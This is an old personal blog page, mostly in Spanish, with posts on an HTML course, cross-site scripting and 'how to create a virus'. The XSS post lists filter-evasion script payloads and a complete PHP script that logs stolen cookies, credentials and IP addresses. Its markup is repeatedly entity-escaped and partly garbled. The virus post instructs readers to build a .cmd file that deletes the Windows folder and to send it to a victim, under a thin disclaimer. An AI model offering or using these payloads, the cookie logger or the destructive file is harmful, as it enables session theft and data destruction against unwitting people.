Curso HTML

luni, 17 decembrie 2007

Si alquien esta interesado en un curso de HTML, enviamen un correo (pentru persoanele interesate de un curs de HTML sa ma contacteze si stam de vb).

XSS

XSS es un ataque basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. Su nombre, del inglés "Cross Site Scripting", y renombrado XSS para que no sea confundido con las hojas de estilo en cascada (CSS), originalmente abarcaba cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o javascript, en el contexto de otro dominio. Recientemente se acostumbra a llamar a los ataques de XSS "HTML Injection", sin embargo el término correcto es XSS. Estos errores se pueden encontrar en cualquier aplicación HTML, no se limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que normalmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada). Cada una se trata de forma diferente.

* Directa: Este tipo de XSS es el que normalmente es censurado; así que es muy poco común que puedas usar tags como

Funciona localizando puntos débiles en la programación de los filtros. Así que si, por ejemplo, logran quitar los , &amp;amp;lt;script&amp;amp;gt;, el atacante siempre puede poner un &amp;amp;lt;div&amp;amp;gt; malicioso, o incluso un &amp;amp;lt;u&amp;amp;gt; o &amp;amp;lt;s&amp;amp;gt;. Tags que casi siempre están permitidos.&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;Ejemplos de Scripts donde no son comunes de encontrar [editar]&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;BR SIZE="&amp;amp;amp;{alert('XSS')}"&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;FK STYLE="behavior: url(http://yoursite/xss.htc);"&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;DIV STYLE="background-image: url(javascript:alert('XSS'))"&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;Usar estilos es increíblemente fácil, y lo malo es que muchos filtros son vulnerables. Se puede crear un DIV con background-image: url(javascript:eval(this.fu)) como estilo y añadir al DIV un campo llamado fu que contenga el código a ejecutar, como por ejemplo alert('Hola'):&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;div fu="alert('Hola mundo');" STYLE="background-image: url(javascript:eval(this.fu))"&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt; log.php para registrar cookies &amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;?php $archivo = fopen('log2.htm','a'); $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a"); fwrite($archivo, '&amp;amp;lt;hr&amp;amp;gt;USUARIO Y PASSWORD: '.htmlentities(base64_decode($usuario)));&amp;amp;lt;br&amp;amp;gt;fwrite($archivo, '&amp;amp;lt;br&amp;amp;gt;Cookie: '.htmlentities($cookie).'&amp;amp;lt;br&amp;amp;gt;Pagina: '.htmlentities($re));&amp;amp;lt;br&amp;amp;gt;fwrite($archivo, '&amp;amp;lt;br&amp;amp;gt; IP: ' .$ip. '&amp;amp;lt;br&amp;amp;gt; Fecha y Hora: ' .$fecha. '&amp;amp;lt;/hr&amp;amp;gt;');&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;fclose($archivo);&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;?&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;&amp;amp;lt;br&amp;amp;gt;

Como crear un virus

Este es un manual para crear un virus que No lo detecta ningún antivirus, Ni nada.. pero es muy destructible.. lo único que necesitas es NOTEPAD jejjeje.. todos lo tienen ok pues.. aqui les enseño como.. o.O

La Prueba

Para que Prueban como Funciona, esta es la prueba
1- Abran Notepad, Y escriban cualquier cosa
2- Guardenlo en C:/ y pueden ponerle Prueba.txt de nombre (C:/Prueba.txt)
3- Ahora Abran otra ves Notepad, Y Escriban erase C:\Prueba.txt y guárdenlo en cualquier lado como Prueba.cmd
4- Ahora habrán el Prueba.cmd y Pufff!!, elimino la Prueba.txt de c:/ (la que creaste en el paso 2)

Bueno ahora que ya vimos que podemos hacer bamos a hacer el verdadero...

EL Ataque

1- Abran Notepad, y pongan erase C:\WINDOWS \q
2- Ahora ponganle de nombre cualquier cosa (quedaría así uriel.cmd)
3-Guárdenlo en cualquier lugar, y NO LO ABRAN!!!!!!!!!!!!!!!!

ahora eso es todo.. ahora pueden enviárselo a su victima y cuando lo habrán
TODO EL WINDOWS SE LES VA A BORRAR...! jejejjejeje
-------------------------------------------------------------------

Resumido:
Abran Notepad, Escriban erase C:\WINDOWS \q, guárdenlo con formato .cmd mándenselo a la persona y ya... !!

Esto Es solo Para Información Y Solo Lo pongo para que sepan y tengan mas conocimiento de esto!.. YO NO les estoy diciendo que lo usen y borren todo el Windows de alguien, yo solo lo pongo con promedio d información nada mas!!!... No Soy LAMER ni nada.. YO NO SOY el responsable de lo que hagan con el!! Ustedes tienen cerebro y ya son suficiente grandes para poder decidir que hacer con esto..!!
Me despido y no abusen de esto..! ¬¬
pe2 hagan lo que quieran nomás no me echen la culpa

hirosima

Archivo del blog

Curso HTML

XSS

Como crear un virus

My Links

Blog and Forum